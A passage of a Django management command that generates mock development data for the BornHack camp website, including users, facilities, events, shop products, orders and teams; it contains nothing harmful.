from allauth.account.models import EmailAddress
from camps.models import Camp
from django.contrib.auth.models import User
from django.contrib.gis.geos import Point
from django.core.exceptions import ValidationError
from django.core.management.base import BaseCommand
from django.db.models.signals import post_save
from django.utils import timezone
from django.utils.crypto import get_random_string
from events.models import Routing, Type
from facilities.models import (
Facility,
FacilityFeedback,
FacilityQuickFeedback,
FacilityType,
)
from faker import Faker
from feedback.models import Feedback
from info.models import InfoCategory, InfoItem
from news.models import NewsItem
from profiles.models import Profile
from program.autoscheduler import AutoScheduler
from program.models import (
Event,
EventLocation,
EventProposal,
EventSession,
EventSlot,
EventTrack,
EventType,
SpeakerProposal,
Url,
UrlType,
)
from program.utils import (
get_speaker_availability_form_matrix,
save_speaker_availability,
)
from rideshare.models import Ride
from shop.models import Order, Product, ProductCategory
from sponsors.models import Sponsor, SponsorTier
from teams.models import Team, TeamMember, TeamShift, TeamTask
from tickets.models import TicketType
from tokens.models import Token, TokenFind
from utils.slugs import unique_slugify
from villages.models import Village
fake = Faker()
tz = pytz.timezone("Europe/Copenhagen")
logger = logging.getLogger("bornhack.%s" % __name__)
@factory.django.mute_signals(post_save)
class ProfileFactory(factory.django.DjangoModelFactory):
class Meta:
model = Profile
user = factory.SubFactory("self.UserFactory", profile=None)
name = factory.Faker("name")
description = factory.Faker("text")
public_credit_name = factory.Faker("name")
public_credit_name_approved = True
@factory.django.mute_signals(post_save)
class UserFactory(factory.django.DjangoModelFactory):
class Meta:
model = User
profile = factory.RelatedFactory(ProfileFactory, "user")
class EmailAddressFactory(factory.django.DjangoModelFactory):
class Meta:
model = EmailAddress
primary = False
verified = True
def output_fake_md_description():
fake_text = "\n".join(fake.paragraphs(nb=3, ext_word_list=None))
fake_text += "\n\n"
fake_text += "\n".join(fake.paragraphs(nb=3, ext_word_list=None))
fake_text += "\n\n"
fake_text += "## " + fake.sentence(nb_words=3) + "\n"
fake_text += "\n".join(fake.paragraphs(nb=3, ext_word_list=None))
fake_text += "\n\n"
fake_text += ''
fake_text += "\n\n"
fake_text += "\n".join(fake.paragraphs(nb=3, ext_word_list=None))
fake_text += "\n\n"
fake_text += "* [" + fake.sentence(nb_words=3) + "](" + fake.uri() + ")\n"
fake_text += "* [" + fake.sentence(nb_words=3) + "](" + fake.uri() + ")\n"
return fake_text
def output_fake_description():
fake_text = "\n".join(fake.paragraphs(nb=3, ext_word_list=None))
fake_text += "* [" + fake.sentence(nb_words=3) + "](" + fake.uri() + ")\n"
return fake_text
class SpeakerProposalFactory(factory.django.DjangoModelFactory):
class Meta:
model = SpeakerProposal
name = factory.Faker("name")
email = factory.Faker("email")
biography = output_fake_md_description()
submission_notes = factory.Iterator(["", output_fake_description()])
needs_oneday_ticket = factory.Iterator([True, False])
class EventProposalFactory(factory.django.DjangoModelFactory):
class Meta:
model = EventProposal
user = factory.Iterator(User.objects.all())
title = factory.Faker("sentence")
abstract = output_fake_md_description()
allow_video_recording = factory.Iterator([True, True, True, False])
submission_notes = factory.Iterator(["", output_fake_description()])
use_provided_speaker_laptop = factory.Iterator([True, False])
class EventProposalUrlFactory(factory.django.DjangoModelFactory):
class Meta:
model = Url
url = factory.Faker("url")
url_type = factory.Iterator(UrlType.objects.all())
class SpeakerProposalUrlFactory(factory.django.DjangoModelFactory):
class Meta:
model = Url
url = factory.Faker("url")
url_type = factory.Iterator(UrlType.objects.all())
class Command(BaseCommand):
args = "none"
help = "Create mock data for development instances"
def create_camps(self):
self.output("Creating camps...")
camps = [
dict(year=2016, tagline="Initial Commit", colour="#004dff", read_only=True),
dict(year=2017, tagline="Make Tradition", colour="#750787", read_only=True),
dict(year=2018, tagline="scale it", colour="#008026", read_only=True),
dict(year=2019, tagline="a new /home", colour="#ffed00", read_only=True),
dict(year=2020, tagline="Going Viral", colour="#ff8c00", read_only=False),
dict(year=2021, tagline="Undecided", colour="#e40303", read_only=False),
]
camp_instances = []
for camp in camps:
year = camp["year"]
read_only = camp["read_only"]
camp_instances.append(
(
Camp.objects.create(
title="BornHack {}".format(year),
tagline=camp["tagline"],
slug="bornhack-{}".format(year),
shortslug="bornhack-{}".format(year),
buildup=(
tz.localize(datetime(year, 8, 25, 12, 0)),
tz.localize(datetime(year, 8, 27, 12, 0)),
),
camp=(
tz.localize(datetime(year, 8, 27, 12, 0)),
tz.localize(datetime(year, 9, 3, 12, 0)),
),
teardown=(
tz.localize(datetime(year, 9, 3, 12, 0)),
tz.localize(datetime(year, 9, 5, 12, 0)),
),
colour=camp["colour"],
),
read_only,
)
)
return camp_instances
def create_event_routing_types(self):
t, created = Type.objects.get_or_create(name="public_credit_name_changed")
t, created = Type.objects.get_or_create(name="ticket_created")
def create_users(self):
self.output("Creating users...")
users = {}
for i in range(0, 16):
username = "user{}".format(i)
user = UserFactory.create(
username=username, email="{}<EMAIL>".format(username)
)
user.set_password(<PASSWORD>)
user.save()
users[i] = user
EmailAddressFactory.create(
user=user, email="{}<EMAIL>".<EMAIL>(username)
)
admin = User.objects.create_superuser(
username="admin", email="<EMAIL>", password="<PASSWORD>"
)
users["admin"] = admin
admin.profile.name = "Administrator"
admin.profile.description = "Default adminstrative user"
admin.profile.public_credit_name = "Administrator"
admin.profile.public_credit_name_approved = True
admin.profile.save()
EmailAddress.objects.create(
user=admin, email="<EMAIL>", verified=True, primary=True
)
return users
def create_news(self):
NewsItem.objects.create(
title="unpublished news item", content="unpublished news body here"
)
def create_quickfeedback_options(self):
options = {}
self.output("Creating quickfeedback options")
options["na"] = FacilityQuickFeedback.objects.create(
feedback="N/A", icon="fas fa-times"
)
options["attention"] = FacilityQuickFeedback.objects.create(
feedback="Needs attention"
)
options["toiletpaper"] = FacilityQuickFeedback.objects.create(
feedback="Needs more toiletpaper", icon="fas fa-toilet-paper"
)
options["cleaning"] = FacilityQuickFeedback.objects.create(
feedback="Needs cleaning", icon="fas fa-broom"
)
options["power"] = FacilityQuickFeedback.objects.create(
feedback="No power", icon="fas fa-bolt"
)
return options
def create_facility_types(self, camp, teams, options):
types = {}
self.output("Creating facility types...")
types["toilet"] = FacilityType.objects.create(
name="Toilets",
description="All the toilets",
icon="fas fa-toilet",
marker="greyIcon",
responsible_team=teams["shit"],
)
types["toilet"].quickfeedback_options.add(options["na"])
types["toilet"].quickfeedback_options.add(options["attention"])
types["toilet"].quickfeedback_options.add(options["toiletpaper"])
types["toilet"].quickfeedback_options.add(options["cleaning"])
types["power"] = FacilityType.objects.create(
name="Power Infrastructure",
description="Power related infrastructure, distribution points, distribution cables, and so on.",
icon="fas fa-plug",
marker="goldIcon",
responsible_team=teams["power"],
)
types["power"].quickfeedback_options.add(options["attention"])
types["power"].quickfeedback_options.add(options["power"])
return types
def create_facilities(self, facility_types):
facilities = {}
self.output("Creating facilities...")
facilities["toilet1"] = Facility.objects.create(
facility_type=facility_types["toilet"],
name="Toilet NOC East",
description="Toilet on the east side of the NOC building",
location=Point(9.939783, 55.387217),
)
facilities["toilet2"] = Facility.objects.create(
facility_type=facility_types["toilet"],
name="Toilet NOC West",
description="Toilet on the west side of the NOC building",
location=Point(9.93967, 55.387197),
)
facilities["pdp1"] = Facility.objects.create(
facility_type=facility_types["power"],
name="PDP1",
description="In orga area",
location=Point(9.94079, 55.388022),
)
facilities["pdp2"] = Facility.objects.create(
facility_type=facility_types["power"],
name="PDP2",
description="In bar area",
location=Point(9.942036, 55.387891),
)
facilities["pdp3"] = Facility.objects.create(
facility_type=facility_types["power"],
name="PDP3",
description="In speaker tent",
location=Point(9.938416, 55.387109),
)
facilities["pdp4"] = Facility.objects.create(
facility_type=facility_types["power"],
name="PDP4",
description="In food area",
location=Point(9.940146, 55.386983),
)
return facilities
def create_facility_feedbacks(self, facilities, options, users):
self.output("Creating facility feedbacks...")
FacilityFeedback.objects.create(
user=users[1],
facility=facilities["toilet1"],
quick_feedback=options["attention"],
comment="Something smells wrong",
urgent=True,
)
FacilityFeedback.objects.create(
user=users[2],
facility=facilities["toilet1"],
quick_feedback=options["toiletpaper"],
urgent=False,
)
FacilityFeedback.objects.create(
facility=facilities["toilet2"],
quick_feedback=options["cleaning"],
comment="This place needs cleaning please. Anonymous feedback.",
urgent=False,
)
FacilityFeedback.objects.create(
facility=facilities["pdp1"],
quick_feedback=options["attention"],
comment="Rain cover needs some work, and we need more free plugs! This feedback is submitted anonymously.",
urgent=False,
)
FacilityFeedback.objects.create(
user=users[5],
facility=facilities["pdp2"],
quick_feedback=options["power"],
comment="No power, please help",
urgent=True,
)
def create_event_types(self):
types = {}
self.output("Creating event types...")
types["workshop"] = EventType.objects.create(
name="Workshop",
slug="workshop",
color="#ff9900",
light_text=False,
public=True,
description="Workshops actively involve the participants in the learning experience",
icon="toolbox",
host_title="Host",
event_duration_minutes="180",
support_autoscheduling=True,
support_speaker_event_conflicts=True,
)
types["talk"] = EventType.objects.create(
name="Talk",
slug="talk",
color="#2D9595",
light_text=True,
public=True,
description="A presentation on a stage",
icon="chalkboard-teacher",
host_title="Speaker",
event_duration_minutes="60",
support_autoscheduling=True,
support_speaker_event_conflicts=True,
)
types["lightning"] = EventType.objects.create(
name="Lightning Talk",
slug="lightning-talk",
color="#ff0000",
light_text=True,
public=True,
description="A short 5-10 minute presentation",
icon="bolt",
host_title="Speaker",
event_duration_minutes="5",
support_speaker_event_conflicts=True,
)
types["music"] = EventType.objects.create(
name="Music Act",
slug="music",
color="#1D0095",
light_text=True,
public=True,
description="A musical performance",
icon="music",
host_title="Artist",
event_duration_minutes="180",
support_autoscheduling=True,
support_speaker_event_conflicts=True,
)
types["keynote"] = EventType.objects.create(
name="Keynote",
slug="keynote",
color="#FF3453",
light_text=True,
description="A keynote presentation",
icon="star",
host_title="Speaker",
event_duration_minutes="90",
support_autoscheduling=True,
support_speaker_event_conflicts=True,
)
types["debate"] = EventType.objects.create(
name="Debate",
slug="debate",
color="#F734C3",
light_text=True,
description="A panel debate with invited guests",
icon="users",
host_title="Guest",
public=True,
event_duration_minutes="120",
support_autoscheduling=True,
support_speaker_event_conflicts=True,
)
types["facility"] = EventType.objects.create(
name="Facilities",
slug="facilities",
color="#cccccc",
light_text=False,
include_in_event_list=False,
description="Events involving facilities like bathrooms, food area and so on",
icon="home",
host_title="Host",
event_duration_minutes="720",
support_speaker_event_conflicts=False,
)
types["recreational"] = EventType.objects.create(
name="Recreational Event",
slug="recreational-event",
color="#0000ff",
light_text=True,
public=True,
description="Events of a recreational nature",
icon="dice",
host_title="Host",
event_duration_minutes="600",
support_autoscheduling=False,
support_speaker_event_conflicts=True,
)
return types
def create_url_types(self):
self.output("Creating UrlType objects...")
t, created = UrlType.objects.get_or_create(
name="Other", defaults={"icon": "fas fa-link"}
)
t, created = UrlType.objects.get_or_create(
name="Homepage", defaults={"icon": "fas fa-link"}
)
t, created = UrlType.objects.get_or_create(
name="Slides", defaults={"icon": "fas fa-chalkboard-teacher"}
)
t, created = UrlType.objects.get_or_create(
name="Twitter", defaults={"icon": "fab fa-twitter"}
)
t, created = UrlType.objects.get_or_create(
name="Mastodon", defaults={"icon": "fab fa-mastodon"}
)
t, created = UrlType.objects.get_or_create(
name="Facebook", defaults={"icon": "fab fa-facebook"}
)
t, created = UrlType.objects.get_or_create(
name="Project", defaults={"icon": "fas fa-link"}
)
t, created = UrlType.objects.get_or_create(
name="Blog", defaults={"icon": "fas fa-link"}
)
t, created = UrlType.objects.get_or_create(
name="Github", defaults={"icon": "fab fa-github"}
)
t, created = UrlType.objects.get_or_create(
name="Keybase", defaults={"icon": "fab fa-keybase"}
)
t, created = UrlType.objects.get_or_create(
name="Recording", defaults={"icon": "fas fa-film"}
)
def create_product_categories(self):
categories = {}
self.output("Creating productcategories...")
categories["transportation"] = ProductCategory.objects.create(
name="Transportation", slug="transportation"
)
categories["merchandise"] = ProductCategory.objects.create(
name="Merchandise", slug="merchandise"
)
categories["tickets"] = ProductCategory.objects.create(
name="Tickets", slug="tickets"
)
categories["villages"] = ProductCategory.objects.create(
name="Villages", slug="villages"
)
return categories
def create_global_products(self, categories):
products = {}
self.output("Creating global products...")
name = "PROSA bus transport (PROSA members only)"
products["product0"] = Product.objects.create(
name=name,
category=categories["transportation"],
price=125,
description="PROSA is sponsoring a bustrip from Copenhagen to the venue and back.",
available_in=(
tz.localize(datetime(2017, 3, 1, 11, 0)),
tz.localize(datetime(2017, 10, 30, 11, 30)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["transportation"]
).values_list("slug", flat=True),
),
)
name = "PROSA bus transport (open for everyone)"
products["product1"] = Product.objects.create(
name=name,
category=categories["transportation"],
price=125,
description="PROSA is sponsoring a bustrip from Copenhagen to the venue and back.",
available_in=(
tz.localize(datetime(2017, 3, 1, 11, 0)),
tz.localize(datetime(2017, 10, 30, 11, 30)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["transportation"]
).values_list("slug", flat=True),
),
)
name = "T-shirt (large)"
products["product2"] = Product.objects.create(
name=name,
category=categories["merchandise"],
price=160,
description="Get a nice t-shirt",
available_in=(
tz.localize(datetime(2017, 3, 1, 11, 0)),
tz.localize(datetime(2017, 10, 30, 11, 30)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["merchandise"]
).values_list("slug", flat=True),
),
)
name = "Village tent 3x3 meters, no floor"
products["tent1"] = Product.objects.create(
name=name,
description="A description of the tent goes here",
price=3325,
category=categories["villages"],
available_in=(
tz.localize(datetime(2017, 3, 1, 12, 0)),
tz.localize(datetime(2017, 8, 20, 12, 0)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["villages"]
).values_list("slug", flat=True),
),
)
name = "Village tent 3x3 meters, with floor"
products["tent2"] = Product.objects.create(
name=name,
description="A description of the tent goes here",
price=3675,
category=categories["villages"],
available_in=(
tz.localize(datetime(2017, 3, 1, 12, 0)),
tz.localize(datetime(2017, 8, 20, 12, 0)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["villages"]
).values_list("slug", flat=True),
),
)
return products
def create_camp_ticket_types(self, camp):
types = {}
self.output("Creating tickettypes for {}...".format(camp.camp.lower.year))
types["adult_full_week"] = TicketType.objects.create(
name="Adult Full Week", camp=camp
)
types["adult_one_day"] = TicketType.objects.create(
name="Adult One Day", camp=camp
)
types["child_full_week"] = TicketType.objects.create(
name="Child Full Week", camp=camp
)
types["child_one_day"] = TicketType.objects.create(
name="Child One Day", camp=camp
)
return types
def create_camp_products(self, camp, categories, ticket_types):
products = {}
year = camp.camp.lower.year
name = "BornHack {} Standard ticket".format(year)
products["ticket1"] = Product.objects.create(
name=name,
description="A ticket",
price=1200,
category=categories["tickets"],
available_in=(
tz.localize(datetime(year, 1, 1, 12, 0)),
tz.localize(datetime(year, 12, 20, 12, 0)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["tickets"]
).values_list("slug", flat=True),
),
ticket_type=ticket_types["adult_full_week"],
)
name = "BornHack {} Hacker ticket".format(year)
products["ticket2"] = Product.objects.create(
name=name,
description="Another ticket",
price=1337,
category=categories["tickets"],
available_in=(
tz.localize(datetime(year, 1, 1, 12, 0)),
tz.localize(datetime(year, 12, 20, 12, 0)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["tickets"]
).values_list("slug", flat=True),
),
ticket_type=ticket_types["adult_full_week"],
)
return products
def create_orders(self, users, global_products, camp_products):
orders = {}
self.output("Creating orders...")
orders[0] = Order.objects.create(
user=users[1], payment_method="cash", open=None, paid=True
)
orders[0].orderproductrelation_set.create(
product=camp_products["ticket1"], quantity=1
)
orders[0].orderproductrelation_set.create(
product=global_products["tent1"], quantity=1
)
orders[0].mark_as_paid(request=None)
orders[1] = Order.objects.create(
user=users[2], payment_method="cash", open=None
)
orders[1].orderproductrelation_set.create(
product=camp_products["ticket1"], quantity=1
)
orders[1].orderproductrelation_set.create(
product=global_products["tent2"], quantity=1
)
orders[1].mark_as_paid(request=None)
orders[2] = Order.objects.create(
user=users[3], payment_method="cash", open=None
)
orders[2].orderproductrelation_set.create(
product=camp_products["ticket2"], quantity=1
)
orders[2].orderproductrelation_set.create(
product=camp_products["ticket1"], quantity=1
)
orders[2].orderproductrelation_set.create(
product=global_products["tent2"], quantity=1
)
orders[2].mark_as_paid(request=None)
orders[3] = Order.objects.create(
user=users[4], payment_method="cash", open=None
)
orders[3].orderproductrelation_set.create(
product=global_products["product0"], quantity=1
)
orders[3].orderproductrelation_set.create(
product=camp_products["ticket2"], quantity=1
)
orders[3].orderproductrelation_set.create(
product=global_products["tent1"], quantity=1
)
orders[3].mark_as_paid(request=None)
return orders
def create_camp_tracks(self, camp):
tracks = {}
year = camp.camp.lower.year
self.output("Creating event_tracks for {}...".format(year))
tracks[1] = EventTrack.objects.create(
camp=camp, name="BornHack", slug=camp.slug
)
return tracks
def create_event_locations(self, camp):
locations = {}
year = camp.camp.lower.year
self.output("Creating event_locations for {}...".format(year))
locations["speakers_tent"] = EventLocation.objects.create(
name="<NAME>",
slug="speakers-tent",
icon="comment",
camp=camp,
capacity=150,
)
locations["workshop_room_1"] = EventLocation.objects.create(
name="Workshop room 1 (big)",
slug="workshop-room-1",
icon="briefcase",
camp=camp,
capacity=50,
)
locations["workshop_room_2"] = EventLocation.objects.create(
name="Workshop room 2 (small)",
slug="workshop-room-2",
icon="briefcase",
camp=camp,
capacity=25,
)
locations["workshop_room_3"] = EventLocation.objects.create(
name="Workshop room 3 (small)",
slug="workshop-room-3",
icon="briefcase",
camp=camp,
capacity=25,
)
locations["bar_area"] = EventLocation.objects.create(
name="Bar Area",
slug="bar-area",
icon="glass-cheers",
camp=camp,
capacity=50,
)
locations["food_area"] = EventLocation.objects.create(
name="Food Area", slug="food-area", icon="utensils", camp=camp, capacity=50,
)
locations["infodesk"] = EventLocation.objects.create(
name="Infodesk", slug="infodesk", icon="info", camp=camp, capacity=20,
)
# add workshop room conflicts (the big root can not be used while either
# of the small rooms are in use, and vice versa)
locations["workshop_room_1"].conflicts.add(locations["workshop_room_2"])
locations["workshop_room_1"].conflicts.add(locations["workshop_room_3"])
return locations
def create_camp_news(self, camp):
year = camp.camp.lower.year
self.output("Creating news for {}...".format(year))
NewsItem.objects.create(
title="Welcome to {}".format(camp.title),
content="news body here with <b>html</b> support",
published_at=tz.localize(datetime(year, 8, 27, 12, 0)),
)
NewsItem.objects.create(
title="{} is over".format(camp.title),
content="news body here",
published_at=tz.localize(datetime(year, 9, 4, 12, 0)),
)
def create_camp_event_sessions(self, camp, event_types, event_locations):
self.output(f"Creating EventSessions for {camp}...")
days = camp.get_days(camppart="camp")[1:-1]
for day in days:
start = day.lower
EventSession.objects.create(
camp=camp,
event_type=event_types["talk"],
event_location=event_locations["speakers_tent"],
when=(
tz.localize(datetime(start.year, start.month, start.day, 11, 0)),
tz.localize(datetime(start.year, start.month, start.day, 18, 0)),
),
)
EventSession.objects.create(
camp=camp,
event_type=event_types["recreational"],
event_location=event_locations["speakers_tent"],
event_duration_minutes=60,
when=(
tz.localize(datetime(start.year, start.month, start.day, 12, 0)),
tz.localize(datetime(start.year, start.month, start.day, 13, 0)),
),
)
EventSession.objects.create(
camp=camp,
event_type=event_types["music"],
event_location=event_locations["bar_area"],
when=(
tz.localize(datetime(start.year, start.month, start.day, 22, 0)),
tz.localize(datetime(start.year, start.month, start.day, 22, 0))
+ timedelta(hours=3),
),
)
EventSession.objects.create(
camp=camp,
event_type=event_types["workshop"],
event_location=event_locations["workshop_room_1"],
when=(
tz.localize(datetime(start.year, start.month, start.day, 12, 0)),
tz.localize(datetime(start.year, start.month, start.day, 18, 0)),
),
)
EventSession.objects.create(
camp=camp,
event_type=event_types["workshop"],
event_location=event_locations["workshop_room_2"],
when=(
tz.localize(datetime(start.year, start.month, start.day, 12, 0)),
tz.localize(datetime(start.year, start.month, start.day, 18, 0)),
),
)
EventSession.objects.create(
camp=camp,
event_type=event_types["workshop"],
event_location=event_locations["workshop_room_3"],
when=(
tz.localize(datetime(start.year, start.month, start.day, 12, 0)),
tz.localize(datetime(start.year, start.month, start.day, 18, 0)),
),
)
# create sessions for the keynotes
for day in [days[1], days[3], days[5]]:
EventSession.objects.create(
camp=camp,
event_type=event_types["keynote"],
event_location=event_locations["speakers_tent"],
when=(
tz.localize(
datetime(day.lower.year, day.lower.month, day.lower.day, 20, 0)
),
tz.localize(
datetime(day.lower.year, day.lower.month, day.lower.day, 21, 30)
),
),
)
def create_camp_proposals(self, camp, event_types):
year = camp.camp.lower.year
self.output("Creating event- and speaker_proposals for {}...".format(year))
# add 45 talks
talkproposals = EventProposalFactory.create_batch(
45,
track=factory.Iterator(camp.event_tracks.all()),
event_type=event_types["talk"],
)
# and 15 workshops
workshopproposals = EventProposalFactory.create_batch(
15,
track=factory.Iterator(camp.event_tracks.all()),
event_type=event_types["workshop"],
)
# and 3 keynotes
# (in the real world these are submitted as talks
# and promoted to keynotes by the content team)
keynoteproposals = EventProposalFactory.create_batch(
3,
track=factory.Iterator(camp.event_tracks.all()),
event_type=event_types["keynote"],
)
tags = [
"infosec",
"hardware",
"politics",
"django",
"development",
"games",
"privacy",
"vampires",
"linux",
]
for ep in talkproposals + workshopproposals + keynoteproposals:
# create a speakerproposal for this EventProposal
sp = SpeakerProposalFactory(camp=camp, user=ep.user)
ep.speakers.add(sp)
# 20% chance we add an extra speaker
if random.randint(1, 10) > 8:
other_speakers = SpeakerProposal.objects.filter(camp=camp).exclude(
uuid=sp.uuid
)
# ... if we have any...
if other_speakers.exists():
# add an extra speaker
ep.speakers.add(random.choice(other_speakers))
# add tags for 2 out of 3 events
if random.choice([True, True, False]):
# add 1-3 tags for this EP
ep.tags.add(*random.sample(tags, k=random.randint(1, 3)))
EventProposal.objects.create(
user=random.choice(User.objects.all()),
title="Lunch break",
abstract="Daily lunch break. Remember to drink water.",
event_type=event_types["recreational"],
track=random.choice(camp.event_tracks.all()),
).mark_as_approved()
def create_proposal_urls(self, camp):
""" Create URL objects for the proposals """
year = camp.camp.lower.year
self.output(
"Creating URLs for Speaker- and EventProposals for {}...".format(year)
)
SpeakerProposalUrlFactory.create_batch(
100,
speaker_proposal=factory.Iterator(
SpeakerProposal.objects.filter(camp=camp)
),
)
EventProposalUrlFactory.create_batch(
100,
event_proposal=factory.Iterator(
EventProposal.objects.filter(track__camp=camp)
),
)
def generate_speaker_availability(self, camp):
""" Create SpeakerAvailability objects for the SpeakerProposals """
year = camp.camp.lower.year
self.output(
"Generating random SpeakerProposalAvailability for {}...".format(year)
)
for sp in camp.speaker_proposals.all():
# generate a matrix for this speaker_proposals event_types
matrix = get_speaker_availability_form_matrix(
sessions=sp.camp.event_sessions.filter(
event_type__in=sp.event_types.all(),
)
)
# build a "form" object so we can reuse save_speaker_availability()
class FakeForm:
cleaned_data = {}
form = FakeForm()
for date, daychunks in matrix.items():
# 90% chance we have info for any given day
if random.randint(1, 100) > 90:
# no availability info for this entire day, sorry
continue
for daychunk, data in daychunks.items():
if not data:
continue
# 90% chance this speaker is available for any given chunk
form.cleaned_data[data["fieldname"]] = random.randint(1, 100) < 90
# print(f"saving availability for speaker {sp}: {form.cleaned_data}")
save_speaker_availability(form, sp)
def approve_speaker_proposals(self, camp):
""" Approve all keynotes but reject 10% of other events """
for sp in camp.speaker_proposals.filter(
event_proposals__event_type__name="Keynote"
):
sp.mark_as_approved()
for sp in camp.speaker_proposals.filter(proposal_status="pending"):
# we do not approve all speakers
x = random.randint(1, 100)
if x < 90:
sp.mark_as_approved()
elif x < 95:
# leave this as pending
continue
else:
sp.mark_as_rejected()
def approve_event_proposals(self, camp):
for ep in camp.event_proposals.filter(proposal_status="pending"):
# are all speakers for this event approved?
for sp in ep.speakers.all():
if not hasattr(sp, "speaker"):
break
else:
# all speakers are approved, approve the event? always approve keynotes!
if random.randint(1, 100) < 90 or ep.event_type.name == "Keynote":
ep.mark_as_approved()
else:
ep.mark_as_rejected()
# set demand for workshops to see the autoscheduler in action
for event in camp.events.filter(event_type__name="Workshop"):
# this should put about half the workshops in the big room
# (since the small rooms have max. 25 ppl capacity)
event.demand = random.randint(10, 40)
event.save()
def create_camp_scheduling(self, camp):
year = camp.camp.lower.year
self.output("Creating scheduling for {}...".format(year))
# create a lunchbreak daily in speakers tent
lunch = Event.objects.get(track__camp=camp, title="Lunch break")
for day in camp.get_days(camppart="camp")[1:-1]:
date = day.lower.date()
start = tz.localize(datetime(date.year, date.month, date.day, 12, 0))
lunchslot = EventSlot.objects.get(
event_session__event_location=camp.event_locations.get(
name="Speakers Tent"
),
event_session__event_type=EventType.objects.get(
name="Recreational Event"
),
when=(start, start + timedelta(hours=1)),
)
lunchslot.event = lunch
lunchslot.autoscheduled = False
lunchslot.save()
# exercise the autoscheduler a bit
scheduler = AutoScheduler(camp=camp)
schedulestart = timezone.now()
try:
autoschedule = scheduler.calculate_autoschedule()
if autoschedule:
scheduler.apply(autoschedule)
except ValueError as E:
self.output(f"Got exception while calculating autoschedule: {E}")
scheduleduration = timezone.now() - schedulestart
self.output(
f"Done running autoscheduler for {year}... It took {scheduleduration}"
)
def create_camp_speaker_event_conflicts(self, camp):
year = camp.camp.lower.year
self.output(
"Generating event_conflicts for SpeakerProposals for {}...".format(year)
)
# loop over all
for sp in camp.speaker_proposals.all():
# not all speakers add conflicts
if random.choice([True, True, False]):
# pick 0-10 events this speaker wants to attend
conflictcount = random.randint(0, 10)
sp.event_conflicts.set(
Event.objects.filter(
track__camp=camp,
event_type__support_speaker_event_conflicts=True,
).order_by("?")[0:conflictcount]
)
def create_camp_rescheduling(self, camp):
year = camp.camp.lower.year
# reapprove all speaker_proposals so the new availability takes effect
for prop in camp.speaker_proposals.filter(proposal_status="approved"):
prop.mark_as_approved()
# exercise the autoscheduler a bit
self.output("Rescheduling {}...".format(year))
scheduler = AutoScheduler(camp=camp)
schedulestart = timezone.now()
try:
autoschedule, diff = scheduler.calculate_similar_autoschedule()
scheduler.apply(autoschedule)
except ValueError as E:
self.output(f"Got exception while calculating similar autoschedule: {E}")
autoschedule = None
scheduleduration = timezone.now() - schedulestart
self.output(f"Done rescheduling for {year}... It took {scheduleduration}.")
def create_camp_villages(self, camp, users):
year = camp.camp.lower.year
self.output("Creating villages for {}...".format(year))
Village.objects.create(
contact=users[1],
camp=camp,
name="Baconsvin",
slug="baconsvin",
description="The camp with the doorbell-pig! Baconsvin is a group of happy people from Denmark doing a lot of open source, and are always happy to talk about infosec, hacking, BSD, and much more. A lot of the organizers of BornHack live in Baconsvin village. Come by and squeeze the pig and sign our guestbook!",
)
Village.objects.create(
contact=users[2],
camp=camp,
name="NetworkWarriors",
slug="networkwarriors",
description="We will have a tent which house the NOC people, various lab equipment people can play with, and have fun. If you want to talk about networking, come by, and if you have trouble with the Bornhack network contact us.",
)
Village.objects.create(
contact=users[3],
camp=camp,
name="TheCamp.dk",
slug="the-camp",
description="This village is representing TheCamp.dk, an annual danish tech camp held in July. The official subjects for this event is open source software, network and security. In reality we are interested in anything from computers to illumination soap bubbles and irish coffee",
)
def create_camp_teams(self, camp):
teams = {}
year = camp.camp.lower.year
self.output("Creating teams for {}...".format(year))
teams["orga"] = Team.objects.create(
name="Orga",
description="The Orga team are the main organisers. All tasks are Orga responsibility until they are delegated to another team",
camp=camp,
needs_members=False,
permission_set="orgateam_permission",
)
teams["noc"] = Team.objects.create(
name="NOC",
description="The NOC team is in charge of establishing and running a network onsite.",
camp=camp,
permission_set="nocteam_permission",
)
teams["bar"] = Team.objects.create(
name="Bar",
description="The Bar team plans, builds and run the IRL bar!",
camp=camp,
permission_set="barteam_permission",
)
teams["shuttle"] = Team.objects.create(
name="Shuttle",
description="The shuttle team drives people to and from the trainstation or the supermarket",
camp=camp,
permission_set="shuttleteam_permission",
)
teams["power"] = Team.objects.create(
name="Power",
description="The power team makes sure we have power all over the venue",
camp=camp,
permission_set="powerteam_permission",
)
teams["shit"] = Team.objects.create(
name="Sanitation",
description="Team shit takes care of the toilets",
camp=camp,
permission_set="sanitationteam_permission",
)
teams["content"] = Team.objects.create(
name="Content",
description="The Content Team handles stuff on the program",
camp=camp,
mailing_list="<EMAIL>",
permission_set="contentteam_permission",
)
return teams
def create_camp_team_tasks(self, camp, teams):
year = camp.camp.lower.year
self.output("Creating TeamTasks for {}...".format(year))
TeamTask.objects.create(
team=teams["noc"],
name="Setup private networks",
description="All the private networks need to be setup",
)
TeamTask.objects.create(
team=teams["noc"],
name="Setup public networks",
description="All the public networks need to be setup",
)
TeamTask.objects.create(
team=teams["noc"],
name="Deploy access points",
description="All access points need to be deployed",
)
TeamTask.objects.create(
team=teams["noc"],
name="Deploy fiber cables",
description="We need the fiber deployed where necessary",
)
TeamTask.objects.create(
team=teams["bar"],
name="List of booze",
description="A list of the different booze we need to have in the bar durng bornhack",
)
TeamTask.objects.create(
team=teams["bar"],
name="Chairs",
description="We need a solution for chairs",
)
TeamTask.objects.create(
team=teams["bar"], name="Taps", description="Taps must be ordered"
)
TeamTask.objects.create(
team=teams["bar"],
name="Coffee",
description="We need to get some coffee for our coffee machine",
)
TeamTask.objects.create(
team=teams["bar"],
name="Ice",
description="We need ice cubes and crushed ice in the bar",
)
def create_camp_team_memberships(self, camp, teams, users):
memberships = {}
year = camp.camp.lower.year
self.output("Creating team memberships for {}...".format(year))
# noc team
memberships["noc"] = {}
memberships["noc"]["user4"] = TeamMember.objects.create(
team=teams["noc"], user=users[4], approved=True, responsible=True
)
memberships["noc"]["user1"] = TeamMember.objects.create(
team=teams["noc"], user=users[1], approved=True
)
memberships["noc"]["user5"] = TeamMember.objects.create(
team=teams["noc"], user=users[5], approved=True
)
memberships["noc"]["user2"] = TeamMember.objects.create(
team=teams["noc"], user=users[2]
)
# bar team
memberships["bar"] = {}
